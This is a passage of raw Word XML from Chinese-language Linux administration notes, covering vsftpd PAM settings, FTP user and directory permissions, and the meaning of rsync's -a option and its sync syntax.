          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以登录，但是没有</w:t>
      </w:r>
      <w:r w:rsidR="00734516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00734516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，只是简单可</w:t>
      </w:r>
      <w:r w:rsidR="00734516" w:rsidRPr="00742684">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以看到</w:t>
      </w:r>
      <w:r w:rsidR="00742684" w:rsidRPr="00742684">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>简单的</w:t>
      </w:r>
      <w:r w:rsidR="00742684" w:rsidRPr="00742684">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="00742684" w:rsidRPr="00742684">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4370185E" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>syj@sanduo-Ubuntu:/etc/pam.d$</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63B434" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Standard behaviour for ftpd(8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204F181" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>auth    required        pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1A7B2" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547B3C97" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Note: vsftpd handles anonymous logins on its own. Do not enable pam_ftp.so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D06066" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530EDFFA" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Standard pam includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB35920" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@include common-account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F22A1" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@include common-session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9033A8" w14:textId="77777777" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@include common-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715E057E" w14:textId="301AA493" w:rsidR="000939E9" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>auth    required        pam_shells.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72488F93" w14:textId="77777777" w:rsidR="00A36436" w:rsidRDefault="00A36436" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73079E7C" w14:textId="3580E0A8" w:rsidR="00C904F1" w:rsidRDefault="00C904F1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录权限方面注意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF009AF" w14:textId="77777777" w:rsidR="0016081D" w:rsidRDefault="0016081D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DCE63D" w14:textId="3A88AD63" w:rsidR="00C904F1" w:rsidRDefault="003B19BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>at /etc/passwd | grep ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实有俩用户：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284328B6" w14:textId="77777777" w:rsidR="00CA0C6B" w:rsidRPr="00CA0C6B" w:rsidRDefault="00CA0C6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0C6B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ftp:x:114:120:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF872A1" w14:textId="337DA8A2" w:rsidR="003B19BE" w:rsidRDefault="00CA0C6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0C6B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ftpuser:x:1001:1001::/srv/ftp/data:/bin/ftponly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD38EBD" w14:textId="77777777" w:rsidR="003B19BE" w:rsidRDefault="003B19BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C20642" w14:textId="60F48544" w:rsidR="00CA0C6B" w:rsidRDefault="00CA0C6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vsftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己生成的用户，你设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:t>_root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录后，他会默认是这个权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425FBBF" w14:textId="79777E0B" w:rsidR="00CA0C6B" w:rsidRDefault="00CA0C6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以通常情况，不需要你单独设置权限，不需要做的如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>hown -R ftpuser:ftpuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B8282" w14:textId="77777777" w:rsidR="003B19BE" w:rsidRDefault="003B19BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412320C0" w14:textId="167FD471" w:rsidR="005B0C7E" w:rsidRDefault="005B0C7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_Toc159779731"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>sync</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w14:paraId="1AE22C17" w14:textId="203D6DED" w:rsidR="005B0C7E" w:rsidRDefault="005B0C7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="_Toc159779732"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w14:paraId="40733039" w14:textId="77777777" w:rsidR="005B0C7E" w:rsidRDefault="005B0C7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66657F6D" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数是一个组合参数，代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "archive" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式，它等同于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -rlptgoD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的组合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED677C0" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BCE3F4" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些参数的具体含义如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81F45D" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D885CC4" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：递归复制目录及其子目录下的所有文件和目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BA1E5" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：复制符号链接为符号链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5EAE19" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：保持文件权限不变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1449E21B" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：保持文件时间戳不变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173E44C" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：保持文件组不变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A242F" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：保持文件所有者不变（只有在超级用户运行时才有效）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1ADA31" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：保持设备文件和特殊文件不变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77316FB3" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E97276E" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以一种类似于拷贝的方式进行同步，保留了文件的大多数属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D0751C" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23299E52" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数不包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，所以它不会保留硬链接。如果你需要保留硬链接，你需要显式地添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB7FE4" w14:textId="77777777" w:rsidR="001174F2" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3834D3" w14:textId="5ADA526E" w:rsidR="005B0C7E" w:rsidRDefault="001174F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数也不包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，所以它不会保留</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Access Control Lists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，访问控制列表）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xattrs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extended attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扩展属性）。如果你需要保留这些属性，你需要显式地添加这些参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11293016" w14:textId="77777777" w:rsidR="005B0C7E" w:rsidRPr="005B0C7E" w:rsidRDefault="005B0C7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D530D5" w14:textId="25357E9A" w:rsidR="0016081D" w:rsidRDefault="0016081D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc159779733"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>sync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同步目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="2BF2352F" w14:textId="77777777" w:rsidR="00346EDB" w:rsidRDefault="00346EDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5025A7D2" w14:textId="0E8162A7" w:rsidR="0016081D" w:rsidRDefault="00882262" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rsync</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法有三种，分别是本地到本地形式</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Local to Local</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，本地到远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Local to Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，远程到本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Remote to Local</w:t>
      </w:r>
      <w:r w:rsidRPr="00882262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57B785" w14:textId="408D0735" w:rsidR="00D76427" w:rsidRDefault="00D76427" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程计算机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务监听的端口不是默认端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，请使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项指定端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73C3E0" w14:textId="77777777" w:rsidR="00D76427" w:rsidRDefault="00D76427" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D916394" w14:textId="77777777" w:rsidR="00D76427" w:rsidRDefault="00D76427" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Local to Local:  rsync [OPTION]... [SRC]... DEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D7B3A" w14:textId="77777777" w:rsidR="001C4A20" w:rsidRDefault="001C4A20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA60F2A" w14:textId="77777777" w:rsidR="00D76427" w:rsidRDefault="00D76427" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
